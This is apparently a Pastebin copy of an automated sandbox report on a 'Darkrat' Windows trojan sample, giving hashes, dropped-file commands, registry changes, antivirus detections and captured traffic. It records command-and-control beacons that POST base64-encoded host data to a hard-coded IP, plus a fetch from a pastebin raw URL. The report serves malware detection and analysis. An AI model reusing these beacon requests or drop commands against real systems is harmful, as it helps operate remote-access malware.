Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- * MalFamily: "Darkrat"
- * MalScore: 10.0
- * File Name: "Exes_e8e44a60d885a42f35fa9fcfdb861b1c.exe"
- * File Size: 991232
- * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
- * SHA256: "07c41d2bdb251269b0883b0880068f1480443e4fbd0c9e6f4e5b1b5004148d1c"
- * MD5: "e8e44a60d885a42f35fa9fcfdb861b1c"
- * SHA1: "27751d098c4289645d93a46297ae302236e82989"
- * SHA512: "2377dd0c5b81cb57b8ee98a57fce137a15dc8166425f613934673ec6d119efd5b7bb0f433f68290094591769b4a24b6fc26ed73f70432dcbda664fe9c067b140"
- * CRC32: "64FBA69E"
- * SSDEEP: "24576:ovfF4K7D53n3Un3BnvHfjVZ0FIECXXEVFU:gP93sj7vBAS"
- * Process Execution:
- "Exes_e8e44a60d885a42f35fa9fcfdb861b1c.exe",
- "cmd.exe",
- "VZXeFFOcuZ.exe"
- * Executed Commands:
- "\"C:\\Windows\\System32\\cmd.exe\" /C start C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\VZXeFFOcuZ.exe",
- "cmd /C start C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\VZXeFFOcuZ.exe",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\VZXeFFOcuZ.exe"
- * Signatures Detected:
- "Description": "Creates RWX memory",
- "Details":
- "Description": "A process created a hidden window",
- "Details":
- "Process": "Exes_e8e44a60d885a42f35fa9fcfdb861b1c.exe -> cmd"
- "Description": "Drops a binary and executes it",
- "Details":
- "binary": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\VZXeFFOcuZ.exe"
- "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
- "Details":
- "post_no_referer": "HTTP traffic contains a POST request with no referer header"
- "ip_hostname": "HTTP connection was made to an IP address rather than domain name"
- "suspicious_request": "http://138.68.217.234/request"
- "Description": "Performs some HTTP requests",
- "Details":
- "url": "http://pastebin.com/raw/JyTUuzPa"
- "url": "http://138.68.217.234/request"
- "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
- "Details":
- "Spam": "VZXeFFOcuZ.exe (1456) called API NtQueryInformationFile 29112 times"
- "Spam": "Exes_e8e44a60d885a42f35fa9fcfdb861b1c.exe (572) called API NtQueryInformationFile 29112 times"
- "Description": "Network activity detected but not expressed in API logs",
- "Details":
- "Description": "File has been identified by 18 Antiviruses on VirusTotal as malicious",
- "Details":
- "FireEye": "Generic.mg.e8e44a60d885a42f"
- "McAfee": "RDN/Generic.dx"
- "CrowdStrike": "win/malicious_confidence_70% (W)"
- "Invincea": "heuristic"
- "APEX": "Malicious"
- "Kaspersky": "UDS:DangerousObject.Multi.Generic"
- "AegisLab": "Trojan.Multi.Generic.4!c"
- "McAfee-GW-Edition": "BehavesLike.Win32.Dropper.dh"
- "Trapmine": "malicious.high.ml.score"
- "SentinelOne": "DFI - Suspicious PE"
- "Microsoft": "Trojan:Win32/Zpevdo.A"
- "Endgame": "malicious (high confidence)"
- "ZoneAlarm": "UDS:DangerousObject.Multi.Generic"
- "Acronis": "suspicious"
- "Cylance": "Unsafe"
- "ESET-NOD32": "a variant of Win32/GenKryptik.DQNV"
- "Rising": "Trojan.GenKryptik!8.AA55 (CLOUD)"
- "Fortinet": "W32/GenKryptik.DQNV!tr"
- "Description": "Creates a copy of itself",
- "Details":
- "copy": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\VZXeFFOcuZ.exe"
- "Description": "Created network traffic indicative of malicious activity",
- "Details":
- "signature": "ET TROJAN Win32/DarkRAT CnC Activity"
- * Started Service:
- * Mutexes:
- "Local\\kupaw",
- "Local\\ZoneAttributeCacheCounterMutex",
- "Local\\ZonesCacheCounterMutex",
- "Local\\ZonesLockedCacheCounterMutex"
- * Modified Files:
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\VZXeFFOcuZ.exe"
- * Deleted Files:
- * Modified Registry Keys:
- "HKEY_CURRENT_USER\\Software\\Local AppWizard-Generated Applications",
- "HKEY_CURRENT_USER\\Software\\Local AppWizard-Generated Applications\\HexEditor",
- "HKEY_CURRENT_USER\\Software\\Local AppWizard-Generated Applications\\HexEditor\\Recent File List",
- "HKEY_CURRENT_USER\\Software\\Local AppWizard-Generated Applications\\HexEditor\\Settings",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect"
- * Deleted Registry Keys:
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName"
- * DNS Communications:
- "type": "A",
- "request": "pastebin.com",
- "answers":
- "data": "104.20.209.21",
- "type": "A"
- "data": "104.20.208.21",
- "type": "A"
- * Domains:
- "ip": "104.20.209.21",
- "domain": "pastebin.com"
- * Network Communication - ICMP:
- * Network Communication - HTTP:
- "count": 1,
- "body": "",
- "uri": "http://pastebin.com/raw/JyTUuzPa",
- "user-agent": "Mozilla/5.0 (iPhone; CPU iPhone OS 5_0 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9A334 Safari/7534.48.3",
- "method": "GET",
- "host": "pastebin.com",
- "version": "1.1",
- "path": "/raw/JyTUuzPa",
- "data": "GET /raw/JyTUuzPa HTTP/1.1\r\nAccept: text/plain\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 5_0 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9A334 Safari/7534.48.3\r\nHost: pastebin.com\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "request=YUhkcFpEMWpNVFV4TldFeE1pMHhOelkwTFRRMk16SXRZV05sT1MxaE9XUm1aamt5TlRNeU1EQW1ZMjl0Y0hWMFpYSnVZVzFsUFZOQ1ZWYzNXRFkwSm1GdmNtNXZkRDEwY25WbEptbHVjM1JoYkd4bFpGSmhiVDB6TGprNU9UVTJOU1p1WlhSR2NtRnRaWGR2Y21zeVBYUnlkV1VtYm1WMFJuSmhiV1YzYjNKck16MTBjblZsSm01bGRFWnlZVzFsZDI5eWF6TTFQWFJ5ZFdVbWJtVjBSbkpoYldWM2IzSnJORDFtWVd4elpTWmhiblJwZG1seWRYTTlKbUp2ZEhabGNuTnBiMjQ5TWk0eExqTW1aM0IxVG1GdFpUMWtSemxyWW5jOVBTWmpjSFZPWVcxbFBVbERRV2RKUTBGblNVVnNkV1JIVm5OTFJrbHdTVVpvYkdJeU5HOVZhV3RuVVRGQ1ZrbEZWVEZNVkVreVRucEJaMDFEUWtGSlJFbDFUbXBDU0ZOSWJ6MG1ZWEpqYUQxbFJGa3dKbTl3WlhKcGJtZHplWE4wWlcwOVZqSnNkVnBIT1ROamVVRXpTVVpPYkdOdVduQlpNbFZuVlVkR2FtRjVRWGdtYzNCeVpXRmtkR0ZuUFhCaGJHbDM=",
- "uri": "http://138.68.217.234/request",
- "user-agent": "gate",
- "method": "POST",
- "host": "138.68.217.234",
- "version": "1.1",
- "path": "/request",
- "data": "POST /request HTTP/1.1\r\nAccept: text/plain\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: gate\r\nHost: 138.68.217.234\r\nContent-Length: 660\r\n\r\nrequest=YUhkcFpEMWpNVFV4TldFeE1pMHhOelkwTFRRMk16SXRZV05sT1MxaE9XUm1aamt5TlRNeU1EQW1ZMjl0Y0hWMFpYSnVZVzFsUFZOQ1ZWYzNXRFkwSm1GdmNtNXZkRDEwY25WbEptbHVjM1JoYkd4bFpGSmhiVDB6TGprNU9UVTJOU1p1WlhSR2NtRnRaWGR2Y21zeVBYUnlkV1VtYm1WMFJuSmhiV1YzYjNKck16MTBjblZsSm01bGRFWnlZVzFsZDI5eWF6TTFQWFJ5ZFdVbWJtVjBSbkpoYldWM2IzSnJORDFtWVd4elpTWmhiblJwZG1seWRYTTlKbUp2ZEhabGNuTnBiMjQ5TWk0eExqTW1aM0IxVG1GdFpUMWtSemxyWW5jOVBTWmpjSFZPWVcxbFBVbERRV2RKUTBGblNVVnNkV1JIVm5OTFJrbHdTVVpvYkdJeU5HOVZhV3RuVVRGQ1ZrbEZWVEZNVkVreVRucEJaMDFEUWtGSlJFbDFUbXBDU0ZOSWJ6MG1ZWEpqYUQxbFJGa3dKbTl3WlhKcGJtZHplWE4wWlcwOVZqSnNkVnBIT1ROamVVRXpTVVpPYkdOdVduQlpNbFZuVlVkR2FtRjVRWGdtYzNCeVpXRmtkR0ZuUFhCaGJHbDM=",
- "port": 80
- "count": 25,
- "body": "request=YUhkcFpEMWpNVFV4TldFeE1pMHhOelkwTFRRMk16SXRZV05sT1MxaE9XUm1aamt5TlRNeU1EQW1ZMjl0Y0hWMFpYSnVZVzFsUFZOQ1ZWYzNXRFkwSm1GdmNtNXZkRDEwY25WbEptbHVjM1JoYkd4bFpGSmhiVDB6TGprNU9UVTJOU1p1WlhSR2NtRnRaWGR2Y21zeVBYUnlkV1VtYm1WMFJuSmhiV1YzYjNKck16MTBjblZsSm01bGRFWnlZVzFsZDI5eWF6TTFQWFJ5ZFdVbWJtVjBSbkpoYldWM2IzSnJORDFtWVd4elpTWmhiblJwZG1seWRYTTlKbUp2ZEhabGNuTnBiMjQ5TWk0eExqTW1aM0IxVG1GdFpUMWtSemxyWW5jOVBTWmpjSFZPWVcxbFBVbERRV2RKUTBGblNVVnNkV1JIVm5OTFJrbHdTVVpvYkdJeU5HOVZhV3RuVVRGQ1ZrbEZWVEZNVkVreVRucEJaMDFEUWtGSlJFbDFUbXBDU0ZOSWJ6MG1ZWEpqYUQxbFJGa3dKbTl3WlhKcGJtZHplWE4wWlcwOVZqSnNkVnBIT1ROamVVRXpTVVpPYkdOdVduQlpNbFZuVlVkR2FtRjVRWGdtYzNCeVpXRmtkR0ZuUFhCaGJHbDM=",
- "uri": "http://138.68.217.234/request",
- "user-agent": "gate",
- "method": "POST",
- "host": "138.68.217.234",
- "version": "1.1",
- "path": "/request",
- "data": "POST /request HTTP/1.1\r\nAccept: text/plain\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: gate\r\nHost: 138.68.217.234\r\nContent-Length: 660\r\nCookie: PHPSESSID=fn93a21vhk143tblikrctn9of7\r\n\r\nrequest=YUhkcFpEMWpNVFV4TldFeE1pMHhOelkwTFRRMk16SXRZV05sT1MxaE9XUm1aamt5TlRNeU1EQW1ZMjl0Y0hWMFpYSnVZVzFsUFZOQ1ZWYzNXRFkwSm1GdmNtNXZkRDEwY25WbEptbHVjM1JoYkd4bFpGSmhiVDB6TGprNU9UVTJOU1p1WlhSR2NtRnRaWGR2Y21zeVBYUnlkV1VtYm1WMFJuSmhiV1YzYjNKck16MTBjblZsSm01bGRFWnlZVzFsZDI5eWF6TTFQWFJ5ZFdVbWJtVjBSbkpoYldWM2IzSnJORDFtWVd4elpTWmhiblJwZG1seWRYTTlKbUp2ZEhabGNuTnBiMjQ5TWk0eExqTW1aM0IxVG1GdFpUMWtSemxyWW5jOVBTWmpjSFZPWVcxbFBVbERRV2RKUTBGblNVVnNkV1JIVm5OTFJrbHdTVVpvYkdJeU5HOVZhV3RuVVRGQ1ZrbEZWVEZNVkVreVRucEJaMDFEUWtGSlJFbDFUbXBDU0ZOSWJ6MG1ZWEpqYUQxbFJGa3dKbTl3WlhKcGJtZHplWE4wWlcwOVZqSnNkVnBIT1ROamVVRXpTVVpPYkdOdVduQlpNbFZuVlVkR2FtRjVRWGdtYzNCeVpXRmtkR0ZuUFhCaGJHbDM=",
- "port": 80
- * Network Communication - SMTP:
- * Network Communication - Hosts:
- * Network Communication - IRC:
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement